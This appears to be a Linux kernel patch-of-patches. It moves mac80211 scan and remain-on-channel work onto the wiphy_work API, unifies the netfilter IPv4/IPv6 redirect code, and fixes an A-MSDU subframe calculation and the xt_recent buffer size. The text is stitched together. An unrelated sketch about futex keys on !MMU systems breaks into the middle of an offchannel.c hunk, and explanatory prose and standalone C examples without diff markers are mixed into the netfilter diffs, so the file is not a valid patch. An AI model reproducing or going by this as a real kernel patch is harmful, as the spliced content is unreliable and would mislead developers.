+ 	ieee80211_remove_interfaces(local);
+ 
++	wiphy_lock(local->hw.wiphy);
++	wiphy_delayed_work_cancel(local->hw.wiphy, &local->roc_work);
++	wiphy_work_cancel(local->hw.wiphy, &local->sched_scan_stopped_work);
++	wiphy_work_cancel(local->hw.wiphy, &local->radar_detected_work);
++	wiphy_unlock(local->hw.wiphy);
+ 	rtnl_unlock();
+ 
+-	cancel_delayed_work_sync(&local->roc_work);
+ 	cancel_work_sync(&local->restart_work);
+ 	cancel_work_sync(&local->reconfig_filter);
+-	flush_work(&local->sched_scan_stopped_work);
+-	flush_work(&local->radar_detected_work);
+ 
+ 	ieee80211_clear_tx_pending(local);
+ 	rate_control_deinitialize(local);
+diff --git a/net/mac80211/offchannel.c b/net/mac80211/offchannel.c
+index d78c82d6b6966..50dc379ca097e 100644
+--- a/net/mac80211/offchannel.c
++++ b/net/mac80211/offchannel.c
+@@ -230,7 +230,7 @@ static bool ieee80211_recalc_sw_work(struct ieee80211_local *local,
+ 	if (dur == LONG_MAX)
+ 		return false;
+ 
+-	mod_delayed_work(local->workqueue, &local->roc_work, dur);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work, dur);
+ 	return true;
+ }
+ 
+@@ -258,7 +258,7 @@ static void ieee80211_handle_roc_started(struct ieee80211_roc_work *roc,
+ 	roc->notified = true;
+ }
+ 
+-static void ieee80211_hw_roc_start(struct work_struct *work)
++static void ieee80211_hw_roc_start(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, hw_roc_start);
+@@ -285,7 +285,7 @@ void ieee80211_ready_on_channel(struct ieee80211_hw *hw)
+ 
+ 	trace_api_ready_on_channel(local);
+ 
+-	ieee80211_queue_work(hw, &local->hw_roc_start);
++	wiphy_work_queue(hw->wiphy, &local->hw_roc_start);
+ }
+ EXPORT_SYMBOL_GPL(ieee80211_ready_on_channel);
+ 
+@@ -338,7 +338,7 @@ static void _ieee80211_start_next_roc(struct ieee80211_local *local)
+ 				tmp->started = true;
+ 				tmp->abort = true;
+ 			}
+-			ieee80211_queue_work(&local->hw, &local->hw_roc_done);
++			wiphy_work_queue(local->hw.wiphy, &local->hw_roc_done);
+ 			return;
+ 		}
+ 
+@@ -368,8 +368,8 @@ static void _ieee80211_start_next_roc(struct ieee80211_local *local)
+ 			ieee80211_hw_config(local, 0);
+ 		}
+ 
+-		ieee80211_queue_delayed_work(&local->hw, &local->roc_work,
+-					     msecs_to_jiffies(min_dur));
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work,
++					 msecs_to_jiffies(min_dur));
+ 
+ 		/* tell userspace or send frame(s) */
+ 		list_for_each_entry(tmp, &local->roc_list, list) {
+@@ -407,8 +407,8 @@ void ieee80211_start_next_roc(struct ieee80211_local *local)
+ 		_ieee80211_start_next_roc(local);
+ 	} else {
+ 		/* delay it a bit */
+-		ieee80211_queue_delayed_work(&local->hw, &local->roc_work,
+-					     round_jiffies_relative(HZ/2));
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work,
++					 round_jiffies_relative(HZ / 2));
+ 	}
+ }
+ 
+@@ -451,7 +451,7 @@ static void __ieee80211_roc_work(struct ieee80211_local *local)
+ 	}
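+
On !MMU the process is deliberately left out of the key, since every task shares the single address space; a tiny standalone sketch of the resulting key shape (struct and function names are illustrative):

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct key { void *mm; uintptr_t address; };

static struct key make_private_key(void *mm, uintptr_t addr, bool has_mmu)
{
	struct key k = {
		/* without an MMU, two "processes" mapping the same
		 * region must hash to the same futex key */
		.mm = has_mmu ? mm : NULL,
		.address = addr,
	};
	return k;
}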
+ }
+ 
+-static void ieee80211_roc_work(struct work_struct *work)
++static void ieee80211_roc_work(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, roc_work.work);
+@@ -461,7 +461,7 @@ static void ieee80211_roc_work(struct work_struct *work)
+ 	mutex_unlock(&local->mtx);
+ }
+ 
+-static void ieee80211_hw_roc_done(struct work_struct *work)
++static void ieee80211_hw_roc_done(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, hw_roc_done);
+@@ -482,7 +482,7 @@ void ieee80211_remain_on_channel_expired(struct ieee80211_hw *hw)
+ 
+ 	trace_api_remain_on_channel_expired(local);
+ 
+-	ieee80211_queue_work(hw, &local->hw_roc_done);
++	wiphy_work_queue(hw->wiphy, &local->hw_roc_done);
+ }
+ EXPORT_SYMBOL_GPL(ieee80211_remain_on_channel_expired);
+ 
+@@ -586,8 +586,8 @@ static int ieee80211_start_roc_work(struct ieee80211_local *local,
+ 		/* if not HW assist, just queue & schedule work */
+ 		if (!local->ops->remain_on_channel) {
+ 			list_add_tail(&roc->list, &local->roc_list);
+-			ieee80211_queue_delayed_work(&local->hw,
+-						     &local->roc_work, 0);
++			wiphy_delayed_work_queue(local->hw.wiphy,
++						 &local->roc_work, 0);
+ 		} else {
+ 			/* otherwise actually kick it off here
+ 			 * (for error handling)
+@@ -695,7 +695,7 @@ static int ieee80211_cancel_roc(struct ieee80211_local *local,
+ 	if (!cookie)
+ 		return -ENOENT;
+ 
+-	flush_work(&local->hw_roc_start);
++	wiphy_work_flush(local->hw.wiphy, &local->hw_roc_start);
+ 
+ 	mutex_lock(&local->mtx);
+ 	list_for_each_entry_safe(roc, tmp, &local->roc_list, list) {
+@@ -745,7 +745,7 @@ static int ieee80211_cancel_roc(struct ieee80211_local *local,
+ 	} else {
+ 		/* go through work struct to return to the operating channel */
+ 		found->abort = true;
+-		mod_delayed_work(local->workqueue, &local->roc_work, 0);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->roc_work, 0);
+ 	}
+ 
+  out_unlock:
+@@ -994,9 +994,9 @@ int ieee80211_mgmt_tx_cancel_wait(struct wiphy *wiphy,
+ 
+ void ieee80211_roc_setup(struct ieee80211_local *local)
+ {
+-	INIT_WORK(&local->hw_roc_start, ieee80211_hw_roc_start);
+-	INIT_WORK(&local->hw_roc_done, ieee80211_hw_roc_done);
+-	INIT_DELAYED_WORK(&local->roc_work, ieee80211_roc_work);
++	wiphy_work_init(&local->hw_roc_start, ieee80211_hw_roc_start);
++	wiphy_work_init(&local->hw_roc_done, ieee80211_hw_roc_done);
++	wiphy_delayed_work_init(&local->roc_work, ieee80211_roc_work);
+ 	INIT_LIST_HEAD(&local->roc_list);
+ }
+ 
+diff --git a/net/mac80211/scan.c b/net/mac80211/scan.c
+index dc3cdee51e660..c37e2576f1c13 100644
+--- a/net/mac80211/scan.c
++++ b/net/mac80211/scan.c
+@@ -291,8 +291,8 @@ void ieee80211_scan_rx(struct ieee80211_local *local, struct sk_buff *skb)
+ 		 * the beacon/proberesp rx gives us an opportunity to upgrade
+ 		 * to active scan
+ 		 */
+-		 set_bit(SCAN_BEACON_DONE, &local->scanning);
+-		 ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
++		set_bit(SCAN_BEACON_DONE, &local->scanning);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ 	}
+ 
+ 	if (ieee80211_is_probe_resp(mgmt->frame_control)) {
+@@ -522,7 +522,7 @@ void ieee80211_scan_completed(struct ieee80211_hw *hw,
+ 
+ 	memcpy(&local->scan_info, info, sizeof(*info));
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ }
+ EXPORT_SYMBOL(ieee80211_scan_completed);
+ 
+@@ -562,8 +562,7 @@ static int ieee80211_start_sw_scan(struct ieee80211_local *local,
+ 	/* We need to set power level at maximum rate for scanning. */
+ 	ieee80211_hw_config(local, 0);
+ 
+-	ieee80211_queue_delayed_work(&local->hw,
+-				     &local->scan_work, 0);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
+ 
+ 	return 0;
+ }
+@@ -620,8 +619,8 @@ void ieee80211_run_deferred_scan(struct ieee80211_local *local)
+ 					lockdep_is_held(&local->mtx))))
+ 		return;
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work,
+-				     round_jiffies_relative(0));
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++				 round_jiffies_relative(0));
+ }
+ 
+ static void ieee80211_send_scan_probe_req(struct ieee80211_sub_if_data *sdata,
+@@ -812,8 +811,8 @@ static int __ieee80211_start_scan(struct ieee80211_sub_if_data *sdata,
+ 		}
+ 
+ 		/* Now, just wait a bit and we are all done! */
+-		ieee80211_queue_delayed_work(&local->hw, &local->scan_work,
+-					     next_delay);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++					 next_delay);
+ 		return 0;
+ 	} else {
+ 		/* Do normal software scan */
+@@ -1060,7 +1059,7 @@ static void ieee80211_scan_state_resume(struct ieee80211_local *local,
+ 	local->next_scan_state = SCAN_SET_CHANNEL;
+ }
+ 
+-void ieee80211_scan_work(struct work_struct *work)
++void ieee80211_scan_work(struct wiphy *wiphy, struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, scan_work.work);
+@@ -1154,7 +1153,8 @@ void ieee80211_scan_work(struct work_struct *work)
+ 		}
+ 	} while (next_delay == 0);
+ 
+-	ieee80211_queue_delayed_work(&local->hw, &local->scan_work, next_delay);
++	wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work,
++				 next_delay);
+ 	goto out;
+ 
+ out_complete:
+@@ -1297,12 +1297,7 @@ void ieee80211_scan_cancel(struct ieee80211_local *local)
+ 		goto out;
+ 	}
+ 
+-	/*
+-	 * If the work is currently running, it must be blocked on
+-	 * the mutex, but we'll set scan_sdata = NULL and it'll
+-	 * simply exit once it acquires the mutex.
+-	 */
+-	cancel_delayed_work(&local->scan_work);
++	wiphy_delayed_work_cancel(local->hw.wiphy, &local->scan_work);
+ 	/* and clean up */
+ 	memset(&local->scan_info, 0, sizeof(local->scan_info));
+ 	__ieee80211_scan_completed(&local->hw, true);
+@@ -1444,10 +1439,11 @@ void ieee80211_sched_scan_end(struct ieee80211_local *local)
+ 
+ 	mutex_unlock(&local->mtx);
+ 
+-	cfg80211_sched_scan_stopped(local->hw.wiphy, 0);
++	cfg80211_sched_scan_stopped_locked(local->hw.wiphy, 0);
+ }
+ 
+-void ieee80211_sched_scan_stopped_work(struct work_struct *work)
++void ieee80211_sched_scan_stopped_work(struct wiphy *wiphy,
++				       struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local,
+@@ -1470,6 +1466,6 @@ void ieee80211_sched_scan_stopped(struct ieee80211_hw *hw)
+ 	if (local->in_reconfig)
+ 		return;
+ 
+-	schedule_work(&local->sched_scan_stopped_work);
++	wiphy_work_queue(hw->wiphy, &local->sched_scan_stopped_work);
+ }
+ EXPORT_SYMBOL(ieee80211_sched_scan_stopped);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index b8c6f6a668fc9..49b71453dec37 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -2918,7 +2918,7 @@ void ieee80211_sta_set_max_amsdu_subframes(struct sta_info *sta,
+ 				   WLAN_EXT_CAPA9_MAX_MSDU_IN_AMSDU_MSB) << 1;
+ 
+ 	if (val)
+-		sta->sta.max_amsdu_subframes = 4 << val;
++		sta->sta.max_amsdu_subframes = 4 << (4 - val);
+ }
+ 
+ #ifdef CONFIG_LOCKDEP
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index 98806c359b173..1088d90e355ba 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -2234,8 +2234,8 @@ static void ieee80211_flush_completed_scan(struct ieee80211_local *local,
+ 		 */
+ 		if (aborted)
+ 			set_bit(SCAN_ABORTED, &local->scanning);
+-		ieee80211_queue_delayed_work(&local->hw, &local->scan_work, 0);
+-		flush_delayed_work(&local->scan_work);
++		wiphy_delayed_work_queue(local->hw.wiphy, &local->scan_work, 0);
++		wiphy_delayed_work_flush(local->hw.wiphy, &local->scan_work);
+ 	}
+ }
+ 
+@@ -4069,7 +4069,8 @@ void ieee80211_dfs_cac_cancel(struct ieee80211_local *local)
+ 	mutex_unlock(&local->mtx);
+ }
+ 
+-void ieee80211_dfs_radar_detected_work(struct work_struct *work)
++void ieee80211_dfs_radar_detected_work(struct wiphy *wiphy,
++				       struct wiphy_work *work)
+ {
+ 	struct ieee80211_local *local =
+ 		container_of(work, struct ieee80211_local, radar_detected_work);
+@@ -4087,9 +4088,7 @@ void ieee80211_dfs_radar_detected_work(struct work_struct *work)
+ 	}
+ 	mutex_unlock(&local->chanctx_mtx);
+ 
+-	wiphy_lock(local->hw.wiphy);
+ 	ieee80211_dfs_cac_cancel(local);
+-	wiphy_unlock(local->hw.wiphy);
+ 
+ 	if (num_chanctx > 1)
+ 		/* XXX: multi-channel is not supported yet */
+@@ -4104,7 +4103,7 @@ void ieee80211_radar_detected(struct ieee80211_hw *hw)
+ 
+ 	trace_api_radar_detected(local);
+ 
+-	schedule_work(&local->radar_detected_work);
++	wiphy_work_queue(hw->wiphy, &local->radar_detected_work);
+ }
+ EXPORT_SYMBOL(ieee80211_radar_detected);
+ 
+diff --git a/net/netfilter/nf_nat_redirect.c b/net/netfilter/nf_nat_redirect.c
+index f91579c821e9a..5b37487d9d11f 100644
+--- a/net/netfilter/nf_nat_redirect.c
++++ b/net/netfilter/nf_nat_redirect.c
+@@ -10,6 +10,7 @@
+ 
+ #include <linux/if.h>
+ #include <linux/inetdevice.h>
++#include <linux/in.h>
+ #include <linux/ip.h>
+ #include <linux/kernel.h>
+ #include <linux/netdevice.h>
+@@ -24,81 +25,104 @@
+ #include <net/netfilter/nf_nat.h>
+ #include <net/netfilter/nf_nat_redirect.h>
+ 
++static unsigned int
++nf_nat_redirect(struct sk_buff *skb, const struct nf_nat_range2 *range,
++		const union nf_inet_addr *newdst)
++{
++	struct nf_nat_range2 newrange;
++	enum ip_conntrack_info ctinfo;
++	struct nf_conn *ct;
++
++	ct = nf_ct_get(skb, &ctinfo);
++
++	memset(&newrange, 0, sizeof(newrange));
++
++	newrange.flags		= range->flags | NF_NAT_RANGE_MAP_IPS;
++	newrange.min_addr	= *newdst;
++	newrange.max_addr	= *newdst;
++	newrange.min_proto	= range->min_proto;
++	newrange.max_proto	= range->max_proto;
++
++	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++}
++
+ unsigned int
+-nf_nat_redirect_ipv4(struct sk_buff *skb,
+-		     const struct nf_nat_ipv4_multi_range_compat *mr,
++nf_nat_redirect_ipv4(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum)
+ {
+-	struct nf_conn *ct;
+-	enum ip_conntrack_info ctinfo;
+-	__be32 newdst;
+-	struct nf_nat_range2 newrange;
++	union nf_inet_addr newdst = {};
+ 
+ 	WARN_ON(hooknum != NF_INET_PRE_ROUTING &&
+ 		hooknum != NF_INET_LOCAL_OUT);
+ 
+-	ct = nf_ct_get(skb, &ctinfo);
+-	WARN_ON(!(ct && (ctinfo == IP_CT_NEW || ctinfo == IP_CT_RELATED)));
+-
+ 	/* Local packets: make them go to loopback */
+ 	if (hooknum == NF_INET_LOCAL_OUT) {
+-		newdst = htonl(0x7F000001);
++		newdst.ip = htonl(INADDR_LOOPBACK);
+ 	} else {
+ 		const struct in_device *indev;
+ 
+-		newdst = 0;
+-
+ 		indev = __in_dev_get_rcu(skb->dev);
+ 		if (indev) {
+ 			const struct in_ifaddr *ifa;
+ 
+ 			ifa = rcu_dereference(indev->ifa_list);
+ 			if (ifa)
+-				newdst = ifa->ifa_local;
++				newdst.ip = ifa->ifa_local;
+ 		}
+ 
+-		if (!newdst)
++		if (!newdst.ip)
+ 			return NF_DROP;
+ 	}
+ 
+-	/* Transfer from original range. */
+-	memset(&newrange.min_addr, 0, sizeof(newrange.min_addr));
+-	memset(&newrange.max_addr, 0, sizeof(newrange.max_addr));
+-	newrange.flags	     = mr->range[0].flags | NF_NAT_RANGE_MAP_IPS;
+-	newrange.min_addr.ip = newdst;
+-	newrange.max_addr.ip = newdst;
+-	newrange.min_proto   = mr->range[0].min;
+-	newrange.max_proto   = mr->range[0].max;
+-
+-	/* Hand modified range to generic setup. */
+-	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++	return nf_nat_redirect(skb, range, &newdst);
+ }
+ EXPORT_SYMBOL_GPL(nf_nat_redirect_ipv4);
+ 
+ static const struct in6_addr loopback_addr = IN6ADDR_LOOPBACK_INIT;
+ 
++static bool nf_nat_redirect_ipv6_usable(const struct inet6_ifaddr *ifa, unsigned int scope)
++{
++	unsigned int ifa_addr_type = ipv6_addr_type(&ifa->addr);
++
++	if (ifa_addr_type & IPV6_ADDR_MAPPED)
++		return false;
++
++	if ((ifa->flags & IFA_F_TENTATIVE) && (!(ifa->flags & IFA_F_OPTIMISTIC)))
++		return false;
++
++	if (scope) {
++		unsigned int ifa_scope = ifa_addr_type & IPV6_ADDR_SCOPE_MASK;
++
++		if (!(scope & ifa_scope))
++			return false;
++	}
++
++	return true;
++}
++
+ unsigned int
+ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 		     unsigned int hooknum)
+ {
+-	struct nf_nat_range2 newrange;
+-	struct in6_addr newdst;
+-	enum ip_conntrack_info ctinfo;
+-	struct nf_conn *ct;
++	union nf_inet_addr newdst = {};
+ 
+-	ct = nf_ct_get(skb, &ctinfo);
+ 	if (hooknum == NF_INET_LOCAL_OUT) {
+-		newdst = loopback_addr;
++		newdst.in6 = loopback_addr;
+ 	} else {
++		unsigned int scope = ipv6_addr_scope(&ipv6_hdr(skb)->daddr);
+ 		struct inet6_dev *idev;
+-		struct inet6_ifaddr *ifa;
+ 		bool addr = false;
+ 
+ 		idev = __in6_dev_get(skb->dev);
+ 		if (idev != NULL) {
++			const struct inet6_ifaddr *ifa;
++
+ 			read_lock_bh(&idev->lock);
+ 			list_for_each_entry(ifa, &idev->addr_list, if_list) {
+-				newdst = ifa->addr;
++				if (!nf_nat_redirect_ipv6_usable(ifa, scope))
++					continue;
++
++				newdst.in6 = ifa->addr;
+ 				addr = true;
+ 				break;
+ 			}
+@@ -109,12 +133,6 @@ nf_nat_redirect_ipv6(struct sk_buff *skb, const struct nf_nat_range2 *range,
+ 			return NF_DROP;
+ 	}
+ 
+-	newrange.flags		= range->flags | NF_NAT_RANGE_MAP_IPS;
+-	newrange.min_addr.in6	= newdst;
+-	newrange.max_addr.in6	= newdst;
+-	newrange.min_proto	= range->min_proto;
+-	newrange.max_proto	= range->max_proto;
+-
+-	return nf_nat_setup_info(ct, &newrange, NF_NAT_MANIP_DST);
++	return nf_nat_redirect(skb, range, &newdst);
+ }
+ EXPORT_SYMBOL_GPL(nf_nat_redirect_ipv6);
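+
The refactor above funnels both families through one helper keyed on union nf_inet_addr, so only the target-address selection stays per-family. A userspace sketch of why the union makes that possible (type and field names mimic the kernel's but are illustrative):

#include <netinet/in.h>
#include <stdint.h>

union inet_addr {
	uint32_t	ip;	/* IPv4, network byte order */
	struct in6_addr	in6;	/* IPv6 */
};

struct range {
	union inet_addr min_addr, max_addr;
};

static void set_redirect_target(struct range *r,
				const union inet_addr *newdst)
{
	/* family-agnostic: v4 and v6 callers pass the same union */
	r->min_addr = *newdst;
	r->max_addr = *newdst;
}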
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 5c783199b4999..d6d59e36d17a7 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3279,10 +3279,6 @@ static int __nf_tables_dump_rules(struct sk_buff *skb,
+ 			goto cont_skip;
+ 		if (*idx < s_idx)
+ 			goto cont;
+-		if (*idx > s_idx) {
+-			memset(&cb->args[1], 0,
+-					sizeof(cb->args) - sizeof(cb->args[0]));
+-		}
+ 		if (prule)
+ 			handle = prule->handle;
+ 		else
+diff --git a/net/netfilter/nft_redir.c b/net/netfilter/nft_redir.c
+index 5ed64b2bd15e8..08b408d3e113d 100644
+--- a/net/netfilter/nft_redir.c
++++ b/net/netfilter/nft_redir.c
+@@ -64,6 +64,8 @@ static int nft_redir_init(const struct nft_ctx *ctx,
+ 		} else {
+ 			priv->sreg_proto_max = priv->sreg_proto_min;
+ 		}
++
++		priv->flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
+ 	}
+ 
+ 	if (tb[NFTA_REDIR_FLAGS]) {
+@@ -98,25 +100,37 @@ nla_put_failure:
+ 	return -1;
+ }
+ 
+-static void nft_redir_ipv4_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
++static void nft_redir_eval(const struct nft_expr *expr,
++			   struct nft_regs *regs,
++			   const struct nft_pktinfo *pkt)
+ {
+-	struct nft_redir *priv = nft_expr_priv(expr);
+-	struct nf_nat_ipv4_multi_range_compat mr;
++	const struct nft_redir *priv = nft_expr_priv(expr);
++	struct nf_nat_range2 range;
+ 
+-	memset(&mr, 0, sizeof(mr));
++	memset(&range, 0, sizeof(range));
++	range.flags = priv->flags;
+ 	if (priv->sreg_proto_min) {
+-		mr.range[0].min.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_min]);
+-		mr.range[0].max.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_max]);
+-		mr.range[0].flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
++		range.min_proto.all = (__force __be16)
++			nft_reg_load16(&regs->data[priv->sreg_proto_min]);
++		range.max_proto.all = (__force __be16)
++			nft_reg_load16(&regs->data[priv->sreg_proto_max]);
+ 	}
+ 
+-	mr.range[0].flags |= priv->flags;
+-
+-	regs->verdict.code = nf_nat_redirect_ipv4(pkt->skb, &mr, nft_hook(pkt));
++	switch (nft_pf(pkt)) {
++	case NFPROTO_IPV4:
++		regs->verdict.code = nf_nat_redirect_ipv4(pkt->skb, &range,
++							  nft_hook(pkt));
++		break;
++#ifdef CONFIG_NF_TABLES_IPV6
++	case NFPROTO_IPV6:
++		regs->verdict.code = nf_nat_redirect_ipv6(pkt->skb, &range,
++							  nft_hook(pkt));
++		break;
++#endif
++	default:
++		WARN_ON_ONCE(1);
++		break;
++	}
+ }
+ 
+ static void
+@@ -129,7 +143,7 @@ static struct nft_expr_type nft_redir_ipv4_type;
+ static const struct nft_expr_ops nft_redir_ipv4_ops = {
+ 	.type		= &nft_redir_ipv4_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
+-	.eval		= nft_redir_ipv4_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_ipv4_destroy,
+ 	.dump		= nft_redir_dump,
+@@ -147,28 +161,6 @@ static struct nft_expr_type nft_redir_ipv4_type __read_mostly = {
+ };
+ 
+ #ifdef CONFIG_NF_TABLES_IPV6
+-static void nft_redir_ipv6_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
+-{
+-	struct nft_redir *priv = nft_expr_priv(expr);
+-	struct nf_nat_range2 range;
+-
+-	memset(&range, 0, sizeof(range));
+-	if (priv->sreg_proto_min) {
+-		range.min_proto.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_min]);
+-		range.max_proto.all = (__force __be16)nft_reg_load16(
+-			&regs->data[priv->sreg_proto_max]);
+-		range.flags |= NF_NAT_RANGE_PROTO_SPECIFIED;
+-	}
+-
+-	range.flags |= priv->flags;
+-
+-	regs->verdict.code =
+-		nf_nat_redirect_ipv6(pkt->skb, &range, nft_hook(pkt));
+-}
+-
+ static void
+ nft_redir_ipv6_destroy(const struct nft_ctx *ctx, const struct nft_expr *expr)
+ {
+@@ -179,7 +171,7 @@ static struct nft_expr_type nft_redir_ipv6_type;
+ static const struct nft_expr_ops nft_redir_ipv6_ops = {
+ 	.type		= &nft_redir_ipv6_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
+-	.eval		= nft_redir_ipv6_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_ipv6_destroy,
+ 	.dump		= nft_redir_dump,
+@@ -198,20 +190,6 @@ static struct nft_expr_type nft_redir_ipv6_type __read_mostly = {
+ #endif
+ 
+ #ifdef CONFIG_NF_TABLES_INET
+-static void nft_redir_inet_eval(const struct nft_expr *expr,
+-				struct nft_regs *regs,
+-				const struct nft_pktinfo *pkt)
+-{
+-	switch (nft_pf(pkt)) {
+-	case NFPROTO_IPV4:
+-		return nft_redir_ipv4_eval(expr, regs, pkt);
+-	case NFPROTO_IPV6:
+-		return nft_redir_ipv6_eval(expr, regs, pkt);
+-	}
+-
+-	WARN_ON_ONCE(1);
+-}
+-
+ static void
+ nft_redir_inet_destroy(const struct nft_ctx *ctx, const struct nft_expr *expr)
+ {
+@@ -222,7 +200,7 @@ static struct nft_expr_type nft_redir_inet_type;
+ static const struct nft_expr_ops nft_redir_inet_ops = {
+ 	.type		= &nft_redir_inet_type,
+ 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_redir)),
+-	.eval		= nft_redir_inet_eval,
++	.eval		= nft_redir_eval,
+ 	.init		= nft_redir_init,
+ 	.destroy	= nft_redir_inet_destroy,
+ 	.dump		= nft_redir_dump,
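
nft_redir.c now records NF_NAT_RANGE_PROTO_SPECIFIED once in priv->flags at init time, builds an nf_nat_range2 directly, and replaces the three per-family eval routines (ipv4, ipv6, inet) with a single nft_redir_eval() that dispatches on nft_pf(pkt). The dispatch shape, reduced to a standalone sketch (handlers are placeholders; the NFPROTO values match the kernel's AF_INET/AF_INET6 numbering):

#include <stdio.h>

enum { NFPROTO_IPV4 = 2, NFPROTO_IPV6 = 10 };

static int redirect_v4(void) { puts("v4 redirect"); return 0; }
static int redirect_v6(void) { puts("v6 redirect"); return 0; }

static int redir_eval(int family)
{
	switch (family) {
	case NFPROTO_IPV4:
		return redirect_v4();
	case NFPROTO_IPV6:
		return redirect_v6();
	default:
		fprintf(stderr, "unexpected family %d\n", family);
		return -1;
	}
}

int main(void)
{
	redir_eval(NFPROTO_IPV4);
	redir_eval(NFPROTO_IPV6);
	return 0;
}
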
+diff --git a/net/netfilter/xt_REDIRECT.c b/net/netfilter/xt_REDIRECT.c
+index 353ca7801251a..ff66b56a3f97d 100644
+--- a/net/netfilter/xt_REDIRECT.c
++++ b/net/netfilter/xt_REDIRECT.c
+@@ -46,7 +46,6 @@ static void redirect_tg_destroy(const struct xt_tgdtor_param *par)
+ 	nf_ct_netns_put(par->net, par->family);
+ }
+ 
+-/* FIXME: Take multiple ranges --RR */
+ static int redirect_tg4_check(const struct xt_tgchk_param *par)
+ {
+ 	const struct nf_nat_ipv4_multi_range_compat *mr = par->targinfo;
+@@ -65,7 +64,14 @@ static int redirect_tg4_check(const struct xt_tgchk_param *par)
+ static unsigned int
+ redirect_tg4(struct sk_buff *skb, const struct xt_action_param *par)
+ {
+-	return nf_nat_redirect_ipv4(skb, par->targinfo, xt_hooknum(par));
++	const struct nf_nat_ipv4_multi_range_compat *mr = par->targinfo;
++	struct nf_nat_range2 range = {
++		.flags       = mr->range[0].flags,
++		.min_proto   = mr->range[0].min,
++		.max_proto   = mr->range[0].max,
++	};
++
++	return nf_nat_redirect_ipv4(skb, &range, xt_hooknum(par));
+ }
+ 
+ static struct xt_target redirect_tg_reg[] __read_mostly = {
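
The legacy xtables target still takes the old nf_nat_ipv4_multi_range_compat layout from userspace, so redirect_tg4() now bridges to the shared helper by populating a stack-local nf_nat_range2 from range[0]. The same conversion with stand-in types:

#include <stdio.h>

/* Stand-ins for the old compat layout and the unified range. */
struct old_range { unsigned int flags; unsigned short min, max; };
struct old_multi { unsigned int rangesize; struct old_range range[1]; };
struct new_range2 { unsigned int flags; unsigned short min_proto, max_proto; };

static void use_range(const struct new_range2 *r)
{
	printf("flags=%#x proto=%u-%u\n", r->flags, r->min_proto, r->max_proto);
}

int main(void)
{
	struct old_multi mr = { 1, { { 0x2, 8080, 8081 } } };
	struct new_range2 range = {
		.flags     = mr.range[0].flags,
		.min_proto = mr.range[0].min,
		.max_proto = mr.range[0].max,
	};

	use_range(&range);
	return 0;
}
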
+diff --git a/net/netfilter/xt_recent.c b/net/netfilter/xt_recent.c
+index 7ddb9a78e3fc8..ef93e0d3bee04 100644
+--- a/net/netfilter/xt_recent.c
++++ b/net/netfilter/xt_recent.c
+@@ -561,7 +561,7 @@ recent_mt_proc_write(struct file *file, const char __user *input,
+ {
+ 	struct recent_table *t = pde_data(file_inode(file));
+ 	struct recent_entry *e;
+-	char buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:5afe:c0de")];
++	char buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:255.255.255.255")];
+ 	const char *c = buf;
+ 	union nf_inet_addr addr = {};
+ 	u_int16_t family;
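
The xt_recent proc buffer is sized from a worst-case literal, and the old literal only covered a fully hexadecimal IPv6 address; an IPv6 address written with an IPv4 dotted-quad tail is longer and was being truncated. sizeof on a string literal includes the terminating NUL, which makes the sizing easy to verify:

#include <stdio.h>

int main(void)
{
	char old_buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:5afe:c0de")];
	char new_buf[sizeof("+b335:1d35:1e55:dead:c0de:1715:255.255.255.255")];

	/* 41 vs 47 bytes: '+' prefix, address text, and the NUL. */
	printf("old=%zu new=%zu\n", sizeof(old_buf), sizeof(new_buf));
	return 0;
}
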
